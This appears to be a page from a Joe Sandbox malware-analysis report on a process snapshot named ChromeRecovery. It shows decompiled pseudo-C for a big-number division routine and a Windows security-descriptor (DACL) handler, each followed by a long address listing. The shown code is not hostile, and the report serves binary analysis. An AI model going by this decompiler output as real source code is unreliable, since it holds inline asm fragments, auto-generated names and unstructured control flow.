Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: d23f2bca4dd417cb9318978b94f002b4e333cc54dbc9ea42dd11cf38c1bbb34a
Instruction ID: 129ca8efa0d06aa01bfc69ea8948c34393b0a05ab29f6e1c1a8954d29e14392c
Opcode Fuzzy Hash: d23f2bca4dd417cb9318978b94f002b4e333cc54dbc9ea42dd11cf38c1bbb34a
Instruction Fuzzy Hash: 89F0F632A111219B8B311F6D9C8896BB75EDFE1715308896BFC5DE3117D9B0DD4082A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C8EFA0 Relevance: 3.4, APIs: 2, Instructions: 449
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00C8EFA0(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				char _v540;
				signed int _v544;
				signed int* _t179;
				signed int _t181;
				intOrPtr _t182;
				signed int _t185;
				signed int* _t187;
				signed int _t189;
				unsigned int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t201;
				intOrPtr _t207;
				void* _t210;
				signed int _t212;
				signed int _t223;
				void* _t227;
				signed int _t230;
				intOrPtr* _t237;
				signed int _t238;
				signed int* _t239;
				signed int _t241;
				signed int _t243;
				signed int _t244;
				void* _t245;
				intOrPtr* _t246;
				signed int _t247;
				signed int _t252;
				unsigned int _t253;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				intOrPtr _t260;
				void* _t264;
				signed char _t270;
				intOrPtr* _t272;
				signed int _t276;
				signed int* _t277;
				signed int _t284;
				signed int _t285;
				signed int* _t288;
				signed int _t291;
				signed int _t293;
				intOrPtr* _t294;
				signed int _t298;
				signed int _t299;
				intOrPtr* _t300;
				signed int _t305;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t314;
				void* _t315;
				signed int _t316;
				signed int* _t323;
				signed int* _t325;
				signed int _t329;
				signed int _t331;
				signed int _t332;
				signed int _t334;
				void* _t335;
				signed int _t340;
				signed int _t345;
				intOrPtr* _t347;
				signed int* _t348;

				_t179 = _a4;
				_t329 =  *_t179;
				if(_t329 == 0) {
					L76:
					__eflags = 0;
					return 0;
				} else {
					_t237 = _a8;
					_t310 =  *_t237;
					_v72 = _t310;
					if(_t310 == 0) {
						goto L76;
					} else {
						_t4 = _t329 - 1; // 0x1cb
						_t252 = _t4;
						_v8 = _t252;
						_t311 = _t310 + 0xffffffff;
						if(_t311 != 0) {
							__eflags = _t311 - _t252;
							if(_t311 > _t252) {
								goto L76;
							} else {
								_t181 = _t252;
								_t284 = _t252 - _t311;
								__eflags = _t252 - _t284;
								if(_t252 < _t284) {
									L19:
									_t284 = _t284 + 1;
									__eflags = _t284;
								} else {
									_t345 =  &(_a4[1]);
									__eflags = _t345;
									_t272 = _t345 + _t252 * 4;
									_t46 = _t237 + 4; // 0xc906d8
									_t347 = _t46 + _t311 * 4;
									while(1) {
										__eflags =  *_t347 -  *_t272;
										if(__eflags != 0) {
											break;
										}
										_t181 = _t181 - 1;
										_t347 = _t347 - 4;
										_t272 = _t272 - 4;
										__eflags = _t181 - _t284;
										if(_t181 >= _t284) {
											continue;
										} else {
											goto L19;
										}
										goto L20;
									}
									if(__eflags < 0) {
										goto L19;
									}
								}
								L20:
								__eflags = _t284;
								if(__eflags == 0) {
									goto L76;
								} else {
									_t182 = _a8;
									_t238 = _v72;
									_t331 =  *(_t182 + _t238 * 4);
									_t54 = _t238 * 4; // 0xffffe8cc
									_t253 =  *(_t182 + _t54 - 4);
									asm("bsr eax, esi");
									_v44 = _t331;
									_v36 = _t253;
									if(__eflags == 0) {
										_t312 = 0x20;
									} else {
										_t312 = 0x1f - _t182;
									}
									_v12 = _t312;
									_v40 = 0x20 - _t312;
									__eflags = _t312;
									if(_t312 != 0) {
										_t270 = _t312;
										_v36 = _v36 << _t270;
										_v44 = _t331 << _t270 | _t253 >> _v40;
										__eflags = _t238 - 2;
										if(_t238 > 2) {
											_t67 = _t238 * 4; // 0xe850ffff
											_t69 =  &_v36;
											 *_t69 = _v36 |  *(_a8 + _t67 - 8) >> _v40;
											__eflags =  *_t69;
										}
									}
									_t332 = 0;
									_v32 = 0;
									_t285 = _t284 + 0xffffffff;
									__eflags = _t285;
									_v80 = _t285;
									if(_t285 >= 0) {
										_t187 = _a4;
										_t256 = _t285 + _t238;
										_v48 = _t256;
										_v52 = _t187 + (_t285 + 1) * 4;
										_t189 = _t187 + _t256 * 4 + 0xfffffffc;
										__eflags = _t189;
										_v28 = _t189;
										do {
											__eflags = _t256 - _v8;
											if(_t256 > _v8) {
												_t257 = 0;
												__eflags = 0;
											} else {
												_t257 =  *(_t189 + 8);
											}
											_t291 =  *(_t189 + 4);
											_t241 = _t257;
											_t190 =  *_t189;
											_v76 = _t257;
											_v56 = 0;
											_v20 = _t190;
											__eflags = _t312;
											if(_t312 != 0) {
												_t298 = _t241;
												_t212 = E00C93C90(_t291, _v12, _t298);
												_t257 = _v12;
												_t241 = _t298;
												_t291 = _t190 >> _v40 | _t212;
												_t332 = _v20 << _t257;
												__eflags = _v48 - 3;
												_v20 = _t332;
												if(_v48 >= 3) {
													_t257 = _v40;
													_t332 = _t332 |  *(_v28 - 4) >> _t257;
													__eflags = _t332;
													_v20 = _t332;
												}
											}
											_push(_t241);
											_t191 = E00C93A30(_t291, _t241, _v44, 0);
											_v56 = _t241;
											_t243 = _t191;
											_t334 = _t332 ^ _t332;
											_t192 = _t291;
											_v24 = _t243;
											_v16 = _t192;
											_t314 = _t257;
											_v68 = _t243;
											_v64 = _t192;
											_v56 = _t334;
											__eflags = _t192;
											if(_t192 != 0) {
												L37:
												_t244 = _t243 + 1;
												asm("adc eax, 0xffffffff");
												_t314 = _t314 + E00C93AD0(_t244, _t192, _v44, 0);
												asm("adc esi, edx");
												_t243 = _t244 | 0xffffffff;
												_t192 = 0;
												__eflags = 0;
												_v56 = _t334;
												_v24 = _t243;
												_v68 = _t243;
												_v16 = 0;
												_v64 = 0;
											} else {
												__eflags = _t243 - 0xffffffff;
												if(_t243 > 0xffffffff) {
													goto L37;
												}
											}
											__eflags = _t334;
											if(__eflags <= 0) {
												if(__eflags < 0) {
													goto L42;
												} else {
													__eflags = _t314 - 0xffffffff;
													if(_t314 <= 0xffffffff) {
														while(1) {
															L42:
															_v24 = _v20;
															_t210 = E00C93AD0(_v36, 0, _t243, _t192);
															__eflags = _t291 - _t314;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L45:
																_t192 = _v16;
																_t243 = _t243 + 0xffffffff;
																_v68 = _t243;
																asm("adc eax, 0xffffffff");
																_t314 = _t314 + _v44;
																__eflags = _t314;
																_v16 = _t192;
																asm("adc dword [ebp-0x34], 0x0");
																_v64 = _t192;
																if(_t314 == 0) {
																	__eflags = _t314 - 0xffffffff;
																	if(_t314 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t210 - _v24;
																if(_t210 <= _v24) {
																	break;
																} else {
																	goto L45;
																}
															}
															L49:
															_v24 = _t243;
															goto L50;
														}
														_t192 = _v16;
														goto L49;
													}
												}
											}
											L50:
											__eflags = _t192;
											if(_t192 != 0) {
												L52:
												_t258 = _v72;
												_t315 = 0;
												_t335 = 0;
												__eflags = _t258;
												if(_t258 != 0) {
													_t246 = _v52;
													_t201 = _a8 + 4;
													__eflags = _t201;
													_v56 = _t201;
													_v20 = _t258;
													do {
														_v8 =  *_t201;
														_t207 =  *_t246;
														_t264 = _t315 + _v68 * _v8;
														asm("adc esi, edx");
														_t315 = _t335;
														_t335 = 0;
														__eflags = _t207 - _t264;
														if(_t207 < _t264) {
															_t315 = _t315 + 1;
															asm("adc esi, esi");
														}
														 *_t246 = _t207 - _t264;
														_t246 = _t246 + 4;
														_t201 = _v56 + 4;
														_t143 =  &_v20;
														 *_t143 = _v20 - 1;
														__eflags =  *_t143;
														_v56 = _t201;
													} while ( *_t143 != 0);
													_t243 = _v24;
													_t258 = _v72;
												}
												__eflags = 0 - _t335;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L61:
														__eflags = _t258;
														if(_t258 != 0) {
															_t245 = 0;
															_t294 = _v52;
															_t340 = _a8 + 4;
															__eflags = _t340;
															_t316 = _t258;
															do {
																_t260 =  *_t294;
																_t151 = _t340 + 4; // 0x8d8b5959
																_t340 = _t151;
																_t294 = _t294 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t294 - 4)) = _t260 +  *((intOrPtr*)(_t340 - 4)) + _t245;
																asm("adc eax, 0x0");
																_t245 = 0;
																_t316 = _t316 - 1;
																__eflags = _t316;
															} while (_t316 != 0);
															_t243 = _v24;
														}
														_t243 = _t243 + 0xffffffff;
														asm("adc dword [ebp-0xc], 0xffffffff");
													} else {
														__eflags = _v76 - _t315;
														if(_v76 < _t315) {
															goto L61;
														}
													}
												}
												_t259 = _v48;
												_v8 = _t259 - 1;
											} else {
												__eflags = _t243;
												if(_t243 == 0) {
													_t259 = _v48;
												} else {
													goto L52;
												}
											}
											_t332 = _v32;
											_t312 = _v12;
											asm("adc esi, 0x0");
											_v32 = 0 + _t243;
											_t293 = _v80 - 1;
											_v52 = _v52 - 4;
											_t256 = _t259 - 1;
											_t189 = _v28 - 4;
											_v80 = _t293;
											_v48 = _t256;
											_v28 = _t189;
											__eflags = _t293;
										} while (_t293 >= 0);
									}
									_t239 = _a4;
									_t255 = _v8 + 1;
									_t185 = _t255;
									__eflags = _t185 -  *_t239;
									if(_t185 <  *_t239) {
										_t288 =  &(( &(_t239[1]))[_t185]);
										do {
											 *_t288 = 0;
											_t288 =  &(_t288[1]);
											_t185 = _t185 + 1;
											__eflags = _t185 -  *_t239;
										} while (_t185 <  *_t239);
									}
									 *_t239 = _t255;
									__eflags = _t255;
									if(_t255 != 0) {
										while(1) {
											__eflags = _t239[_t255];
											if(_t239[_t255] != 0) {
												goto L75;
											}
											_t255 = _t255 + 0xffffffff;
											__eflags = _t255;
											 *_t239 = _t255;
											if(_t255 != 0) {
												continue;
											}
											goto L75;
										}
									}
									L75:
									return _v32;
								}
							}
						} else {
							_t6 = _t237 + 4; // 0xfffff8a4
							_t299 =  *_t6;
							_v8 = _t299;
							if(_t299 != 1) {
								__eflags = _t252;
								if(_t252 != 0) {
									_t247 = 0;
									_v12 = 0;
									_t323 = 0;
									_v28 = 0;
									__eflags = _t252 - 0xffffffff;
									if(_t252 != 0xffffffff) {
										_t276 = _t252 + 1;
										__eflags = _t276;
										_t277 =  &(_t179[_t276]);
										_v32 = _t277;
										do {
											_push(_t247);
											_t227 = E00C93A30( *_t277, _t323, _t299, 0);
											_v28 = _t247;
											_t247 = _v12;
											_t323 = _t277;
											_v64 = _t299;
											_v12 = 0 + _t227;
											_t299 = _v8;
											asm("adc ebx, 0x0");
											_t277 = _v32 - 4;
											_v32 = _t277;
											_t329 = _t329 - 1;
											__eflags = _t329;
										} while (_t329 != 0);
										_t179 = _a4;
									}
									_t36 =  &(_t179[1]); // 0x4
									_t348 = _t36;
									 *_t179 = 0;
									_v544 = 0;
									E00C8A434(_t348, 0x1cc,  &_v540, 0);
									_t223 = _v28;
									_t300 = _a4;
									__eflags = 0 - _t223;
									 *_t348 = _t323;
									asm("sbb ecx, ecx");
									 *(_t300 + 8) = _t223;
									__eflags =  ~0x00000000;
									 *_t300 = 0xbadbae;
									return _v12;
								} else {
									_t325 =  &(_t179[1]);
									 *_t179 = _t252;
									_v544 = _t252;
									E00C8A434(_t325, 0x1cc,  &_v540, _t252);
									_t230 = _t179[1];
									_t305 = _t230 % _v8;
									 *_t325 = _t305;
									__eflags = 0 - _t305;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_a4 =  ~0x00000000;
									return _t230 / _v8;
								}
							} else {
								 *_t179 = _t311;
								_v544 = _t311;
								E00C8A434( &(_t179[1]), 0x1cc,  &_v540, _t311);
								return _t179[1];
							}
						}
					}
				}
			}

0x00c8efa5
0x00c8efb0
0x00c8efb5
0x00c8f41d
0x00c8f421
0x00c8f427
0x00c8efbb
0x00c8efbb
0x00c8efbe
0x00c8efc0
0x00c8efc5
0x00000000
0x00c8efcb
0x00c8efcb
0x00c8efcb
0x00c8efce
0x00c8efd1
0x00c8efd4
0x00c8f0fb
0x00c8f0fd
0x00000000
0x00c8f103
0x00c8f105
0x00c8f107
0x00c8f109
0x00c8f10b
0x00c8f135
0x00c8f135
0x00c8f135
0x00c8f10d
0x00c8f110
0x00c8f110
0x00c8f113
0x00c8f116
0x00c8f119
0x00c8f120
0x00c8f122
0x00c8f124
0x00000000
0x00000000
0x00c8f126
0x00c8f127
0x00c8f12a
0x00c8f12d
0x00c8f12f
0x00000000
0x00c8f131
0x00000000
0x00c8f131
0x00000000
0x00c8f12f
0x00c8f133
0x00000000
0x00000000
0x00c8f133
0x00c8f136
0x00c8f136
0x00c8f138
0x00000000
0x00c8f13e
0x00c8f13e
0x00c8f141
0x00c8f144
0x00c8f147
0x00c8f147
0x00c8f14b
0x00c8f14e
0x00c8f151
0x00c8f154
0x00c8f15f
0x00c8f156
0x00c8f15b
0x00c8f15b
0x00c8f169
0x00c8f16e
0x00c8f171
0x00c8f173
0x00c8f17c
0x00c8f17e
0x00c8f185
0x00c8f188
0x00c8f18b
0x00c8f193
0x00c8f199
0x00c8f199
0x00c8f199
0x00c8f199
0x00c8f18b
0x00c8f19c
0x00c8f19e
0x00c8f1a5
0x00c8f1a5
0x00c8f1a8
0x00c8f1ab
0x00c8f1b1
0x00c8f1b4
0x00c8f1b8
0x00c8f1c1
0x00c8f1c4
0x00c8f1c4
0x00c8f1c7
0x00c8f1d0
0x00c8f1d0
0x00c8f1d3
0x00c8f1da
0x00c8f1da
0x00c8f1d5
0x00c8f1d5
0x00c8f1d5
0x00c8f1dc
0x00c8f1df
0x00c8f1e1
0x00c8f1e3
0x00c8f1e6
0x00c8f1ed
0x00c8f1f0
0x00c8f1f2
0x00c8f200
0x00c8f204
0x00c8f209
0x00c8f20e
0x00c8f215
0x00c8f217
0x00c8f219
0x00c8f21d
0x00c8f220
0x00c8f225
0x00c8f22d
0x00c8f22d
0x00c8f22f
0x00c8f22f
0x00c8f220
0x00c8f232
0x00c8f23a
0x00c8f23f
0x00c8f244
0x00c8f246
0x00c8f248
0x00c8f24a
0x00c8f24d
0x00c8f250
0x00c8f252
0x00c8f255
0x00c8f258
0x00c8f25b
0x00c8f25d
0x00c8f264
0x00c8f269
0x00c8f26c
0x00c8f276
0x00c8f278
0x00c8f27a
0x00c8f27d
0x00c8f27d
0x00c8f27f
0x00c8f282
0x00c8f285
0x00c8f288
0x00c8f28b
0x00c8f25f
0x00c8f25f
0x00c8f262
0x00000000
0x00000000
0x00c8f262
0x00c8f28e
0x00c8f290
0x00c8f292
0x00000000
0x00c8f294
0x00c8f294
0x00c8f297
0x00c8f2a0
0x00c8f2a0
0x00c8f2ae
0x00c8f2b1
0x00c8f2b6
0x00c8f2b8
0x00000000
0x00000000
0x00c8f2ba
0x00c8f2c1
0x00c8f2c1
0x00c8f2c4
0x00c8f2c7
0x00c8f2ca
0x00c8f2cd
0x00c8f2cd
0x00c8f2d0
0x00c8f2d3
0x00c8f2d7
0x00c8f2da
0x00c8f2dc
0x00c8f2df
0x00000000
0x00000000
0x00c8f2e1
0x00c8f2df
0x00c8f2bc
0x00c8f2bc
0x00c8f2bf
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8f2bf
0x00c8f2e6
0x00c8f2e6
0x00000000
0x00c8f2e6
0x00c8f2e3
0x00000000
0x00c8f2e3
0x00c8f297
0x00c8f292
0x00c8f2e9
0x00c8f2e9
0x00c8f2eb
0x00c8f2f5
0x00c8f2f5
0x00c8f2f8
0x00c8f2fa
0x00c8f2fc
0x00c8f2fe
0x00c8f303
0x00c8f306
0x00c8f306
0x00c8f309
0x00c8f30c
0x00c8f310
0x00c8f312
0x00c8f327
0x00c8f329
0x00c8f32b
0x00c8f32d
0x00c8f32f
0x00c8f331
0x00c8f333
0x00c8f335
0x00c8f338
0x00c8f338
0x00c8f33c
0x00c8f33e
0x00c8f344
0x00c8f347
0x00c8f347
0x00c8f347
0x00c8f34b
0x00c8f34b
0x00c8f350
0x00c8f353
0x00c8f353
0x00c8f358
0x00c8f35a
0x00c8f35c
0x00c8f363
0x00c8f363
0x00c8f365
0x00c8f36a
0x00c8f36c
0x00c8f36f
0x00c8f36f
0x00c8f372
0x00c8f374
0x00c8f374
0x00c8f376
0x00c8f376
0x00c8f37b
0x00c8f381
0x00c8f385
0x00c8f388
0x00c8f38b
0x00c8f38d
0x00c8f38d
0x00c8f38d
0x00c8f392
0x00c8f392
0x00c8f395
0x00c8f398
0x00c8f35e
0x00c8f35e
0x00c8f361
0x00000000
0x00000000
0x00c8f361
0x00c8f35c
0x00c8f39c
0x00c8f3a2
0x00c8f2ed
0x00c8f2ed
0x00c8f2ef
0x00c8f3a7
0x00000000
0x00000000
0x00000000
0x00c8f2ef
0x00c8f3aa
0x00c8f3b4
0x00c8f3b7
0x00c8f3ba
0x00c8f3c0
0x00c8f3c1
0x00c8f3c5
0x00c8f3c6
0x00c8f3c9
0x00c8f3cc
0x00c8f3cf
0x00c8f3d2
0x00c8f3d2
0x00c8f1d0
0x00c8f3dd
0x00c8f3e0
0x00c8f3e1
0x00c8f3e3
0x00c8f3e5
0x00c8f3ea
0x00c8f3f0
0x00c8f3f0
0x00c8f3f6
0x00c8f3f9
0x00c8f3fa
0x00c8f3fa
0x00c8f3f0
0x00c8f3fe
0x00c8f400
0x00c8f402
0x00c8f404
0x00c8f404
0x00c8f408
0x00000000
0x00000000
0x00c8f40a
0x00c8f40a
0x00c8f40d
0x00c8f40f
0x00000000
0x00000000
0x00000000
0x00c8f40f
0x00c8f404
0x00c8f411
0x00c8f41c
0x00c8f41c
0x00c8f138
0x00c8efda
0x00c8efda
0x00c8efda
0x00c8efdd
0x00c8efe3
0x00c8f014
0x00c8f016
0x00c8f05b
0x00c8f05d
0x00c8f064
0x00c8f066
0x00c8f069
0x00c8f06c
0x00c8f06e
0x00c8f06e
0x00c8f06f
0x00c8f072
0x00c8f075
0x00c8f075
0x00c8f07f
0x00c8f084
0x00c8f089
0x00c8f08c
0x00c8f091
0x00c8f098
0x00c8f09b
0x00c8f09e
0x00c8f0a1
0x00c8f0a4
0x00c8f0a7
0x00c8f0a7
0x00c8f0a7
0x00c8f0ac
0x00c8f0ac
0x00c8f0af
0x00c8f0af
0x00c8f0b2
0x00c8f0c0
0x00c8f0d1
0x00c8f0d6
0x00c8f0dc
0x00c8f0e1
0x00c8f0e3
0x00c8f0e5
0x00c8f0e9
0x00c8f0ef
0x00c8f0f1
0x00c8f0fa
0x00c8f018
0x00c8f01b
0x00c8f01f
0x00c8f02e
0x00c8f034
0x00c8f039
0x00c8f03d
0x00c8f048
0x00c8f04a
0x00c8f04c
0x00c8f050
0x00c8f053
0x00c8f05a
0x00c8f05a
0x00c8efe5
0x00c8efeb
0x00c8effb
0x00c8f001
0x00c8f013
0x00c8f013
0x00c8efe3
0x00c8efd4
0x00c8efc5

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cab736e47d9e4f7878b85f2be13b9c529a610a8c5462b3cae1fefb3e2b90ecd
Instruction ID: 8ba790d1c931b6f478286b7e6955b5e44887e4860d8c930bc5e3ecf1f0dedfbe
Opcode Fuzzy Hash: 1cab736e47d9e4f7878b85f2be13b9c529a610a8c5462b3cae1fefb3e2b90ecd
Instruction Fuzzy Hash: EEF14071E002199FDF14DFA9D8846ADB7B1FF88318F15826DD825A7391D730AE42CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00C759D6 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00C759D6(void* __ebx, void* __ecx, void* __edx, struct _ACL* __edi, void* _a4) {
				struct _ACL* _v8;
				long _v12;
				long _v16;
				long _v20;
				long _v24;
				struct _SECURITY_DESCRIPTOR* _v28;
				void* _v32;
				long _v36;
				long _v40;
				short _v44;
				signed char _v88;
				void* __esi;
				void* __ebp;
				struct _SECURITY_DESCRIPTOR* _t74;
				void* _t75;
				int _t77;
				int _t82;
				struct _SECURITY_DESCRIPTOR* _t87;
				int _t92;
				long _t103;
				struct _ACL* _t109;
				struct _ACL* _t113;
				void* _t117;
				void* _t119;
				void* _t123;
				struct _SECURITY_DESCRIPTOR* _t124;
				DWORD* _t129;
				intOrPtr* _t130;
				struct _ACL* _t150;
				DWORD* _t152;
				DWORD* _t154;
				void* _t157;
				struct _ACL* _t159;
				intOrPtr* _t160;
				void* _t165;
				void* _t167;
				void* _t171;
				void* _t172;
				void* _t174;

				_t150 = __edi;
				_t149 = __edx;
				_t123 = __ebx;
				_t165 = _t171;
				_t172 = _t171 - 0xc;
				_t157 = __ecx;
				_push(__edi);
				_t74 =  *(__ecx + 4);
				if(_t74 != 0) {
					L21();
					_t74 =  *(__ecx + 4);
				}
				_v8 = _v8 & 0x00000000;
				if(_t74 == 0) {
					L55();
					goto L6;
				} else {
					_t129 =  &_v16;
					if(GetSecurityDescriptorDacl(_t74, _t129,  &_v8,  &_v12) == 0) {
						E00C7239D(_t123, _t129, _t149);
						goto L19;
					} else {
						L6:
						_push(_t123);
						_t124 = _a4;
						_t9 =  &(_t124->Group); // 0x6a206a53
						_t75 =  *_t9;
						if(_t75 != 0 ||  *((intOrPtr*)(_t124 + 0x14)) == 0) {
							_t150 = 0;
							goto L11;
						} else {
							_t117 = E00C753FF(_t124, _t124, _t149, _t150, _t157);
							_a4 = _t117;
							_t150 = E00C83B1B();
							_t129 = _t117;
							if(_t150 == 0) {
								L19:
								_push(0x8007000e);
								goto L20;
							} else {
								_t119 = E00C72712(_t124, _t124, _t150, _t157);
								_t149 = _a4;
								E00C723B6(_t124, _t150, _a4, _t119, _a4);
								_t14 =  &(_t124->Group); // 0x6a206a53
								_t75 =  *_t14;
								L11:
								_pop(_t124);
								if(_t75 != 0 || _t150 != 0) {
									_t77 = 1;
								} else {
									_t77 = 0;
								}
								if(SetSecurityDescriptorDacl( *(_t157 + 4), _t77, _t150, 0) != 0) {
									return E00C83557(_v8);
								} else {
									_t157 = E00C72482();
									E00C83557(_t150);
									_pop(_t129);
									_push(_t157);
									L20:
									_t82 = E00C71185(_t129);
									asm("int3");
									_push(_t165);
									_t167 = _t172;
									_t174 = _t172 - 0x24;
									_push(_t150);
									_t152 = _t129;
									if(_t152[1] == 0) {
										L49:
										return _t82;
									} else {
										_push(_t157);
										_t159 = 0;
										_v44 = 0;
										_t82 = GetSecurityDescriptorControl(_t152[1],  &_v44,  &_v36);
										if(_t82 == 0) {
											_push(0x80004005);
											goto L53;
										} else {
											if((_v44 & 0x00008000) == 0) {
												L48:
												goto L49;
											} else {
												_v24 = 0;
												_v20 = 0;
												_v12 = 0;
												_v16 = 0;
												_v40 = 0;
												MakeAbsoluteSD(_t152[1], 0,  &_v40, 0,  &_v20, 0,  &_v24, 0,  &_v16, 0,  &_v12);
												if(GetLastError() != 0x7a) {
													L54:
													E00C7239D(_t124, _t129, _t149);
													asm("int3");
													_push(_t159);
													_push(_t152);
													_t154 = _t129;
													_t87 = E00C83B1B();
													_t154[1] = _t87;
													_t130 = 0x14;
													if(_t87 == 0) {
														_push(0x8007000e);
														goto L60;
													} else {
														_t92 = InitializeSecurityDescriptor(_t87, 1);
														if(_t92 != 0) {
															return _t92;
														} else {
															_t159 = E00C72482();
															E00C83557(_t154[1]);
															_t154[1] = _t154[1] & 0x00000000;
															_pop(_t130);
															_push(_t159);
															L60:
															E00C71185(_t130);
															asm("int3");
															_push(_t167);
															_push(_t159);
															_t160 = _t130;
															 *_t160 = 0xca41c0;
															E00C77F74(_t130);
															if((_v88 & 0x00000001) != 0) {
																_push(0xc);
																E00C7F62D(_t160);
															}
															return _t160;
														}
													}
												} else {
													_push(_t124);
													_push(_v40);
													_t124 = E00C83B1B();
													if(_v16 == 0) {
														_v28 = 0;
													} else {
														_push(_v16);
														_v28 = E00C83B1B();
													}
													if(_v12 == _t159) {
														_v32 = _t159;
													} else {
														_push(_v12);
														_v32 = E00C83B1B();
													}
													_t103 = _v20;
													if(_t103 == 0) {
														_v36 = _t159;
													} else {
														_push(_t103);
														_v36 = E00C83B1B();
														_t103 = _v20;
													}
													_t129 = _v24;
													if(_t129 != 0) {
														_push(_t129);
														_t113 = E00C83B1B();
														_t129 = _v24;
														_t159 = _t113;
														_t103 = _v20;
													}
													if(_t124 == 0 || _v16 != 0 && _v28 == 0) {
														L50:
														_t152 = 0x8007000e;
														goto L51;
													} else {
														_t149 = _v32;
														if(_v12 == 0 || _t149 != 0) {
															_t109 = _v36;
															if(_t103 == 0 || _t109 != 0) {
																if(_t129 == 0 || _t159 != 0) {
																	_t129 =  &_v20;
																	if(MakeAbsoluteSD(_t152[1], _t124,  &_v40, _t109, _t129, _t159,  &_v24, _v28,  &_v16, _t149,  &_v12) != 0) {
																		_t82 = E00C72C7E(_t152);
																		_t152[1] = _t124;
																		goto L48;
																	} else {
																		_t152 = E00C72482();
																		L51:
																		E00C83557(_t124);
																		E00C83557(_v28);
																		E00C83557(_v32);
																		E00C83557(_v36);
																		E00C83557(_t159);
																		_t174 = _t174 + 0x14;
																		_push(_t152);
																		L53:
																		E00C71185(_t129);
																		goto L54;
																	}
																} else {
																	goto L50;
																}
															} else {
																goto L50;
															}
														} else {
															goto L50;
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00c759d6
0x00c759d6
0x00c759d6
0x00c759d7
0x00c759d9
0x00c759dd
0x00c759df
0x00c759e0
0x00c759e5
0x00c759e7
0x00c759ec
0x00c759ec
0x00c759ef
0x00c759f5
0x00c75a16
0x00000000
0x00c759f7
0x00c759ff
0x00c75a0c
0x00c75aa2
0x00000000
0x00c75a12
0x00c75a1b
0x00c75a1b
0x00c75a1c
0x00c75a1f
0x00c75a1f
0x00c75a24
0x00c75a5f
0x00000000
0x00c75a2c
0x00c75a2e
0x00c75a34
0x00c75a3c
0x00c75a3e
0x00c75a41
0x00c75aa7
0x00c75aa7
0x00000000
0x00c75a43
0x00c75a48
0x00c75a4d
0x00c75a53
0x00c75a58
0x00c75a58
0x00c75a61
0x00c75a61
0x00c75a64
0x00c75a70
0x00c75a6a
0x00c75a6a
0x00c75a6a
0x00c75a80
0x00c75a9f
0x00c75a82
0x00c75a88
0x00c75a8a
0x00c75a8f
0x00c75a90
0x00c75aac
0x00c75aac
0x00c75ab1
0x00c75ab2
0x00c75ab3
0x00c75ab5
0x00c75ab8
0x00c75ab9
0x00c75abf
0x00c75c05
0x00c75c07
0x00c75ac5
0x00c75ac5
0x00c75ac9
0x00c75acf
0x00c75ad6
0x00c75ade
0x00c75c37
0x00000000
0x00c75ae4
0x00c75aeb
0x00c75c04
0x00000000
0x00c75af1
0x00c75af4
0x00c75afc
0x00c75b04
0x00c75b0c
0x00c75b14
0x00c75b1c
0x00c75b2b
0x00c75c41
0x00c75c41
0x00c75c46
0x00c75c47
0x00c75c48
0x00c75c4b
0x00c75c4d
0x00c75c52
0x00c75c55
0x00c75c58
0x00c75c81
0x00000000
0x00c75c5a
0x00c75c5d
0x00c75c65
0x00c75c80
0x00c75c67
0x00c75c6f
0x00c75c71
0x00c75c76
0x00c75c7a
0x00c75c7b
0x00c75c86
0x00c75c86
0x00c75c8b
0x00c75c8c
0x00c75c8f
0x00c75c90
0x00c75c92
0x00c75c98
0x00c75ca1
0x00c75ca3
0x00c75ca6
0x00c75cac
0x00c75cb1
0x00c75cb1
0x00c75c65
0x00c75b31
0x00c75b31
0x00c75b32
0x00c75b3a
0x00c75b40
0x00c75b50
0x00c75b42
0x00c75b42
0x00c75b4b
0x00c75b4b
0x00c75b56
0x00c75b66
0x00c75b58
0x00c75b58
0x00c75b61
0x00c75b61
0x00c75b69
0x00c75b6e
0x00c75b7f
0x00c75b70
0x00c75b70
0x00c75b76
0x00c75b79
0x00c75b7c
0x00c75b82
0x00c75b87
0x00c75b89
0x00c75b8a
0x00c75b90
0x00c75b93
0x00c75b95
0x00c75b95
0x00c75b9a
0x00c75c08
0x00c75c08
0x00000000
0x00c75ba8
0x00c75bac
0x00c75baf
0x00c75bb7
0x00c75bba
0x00c75bc2
0x00c75bd9
0x00c75bee
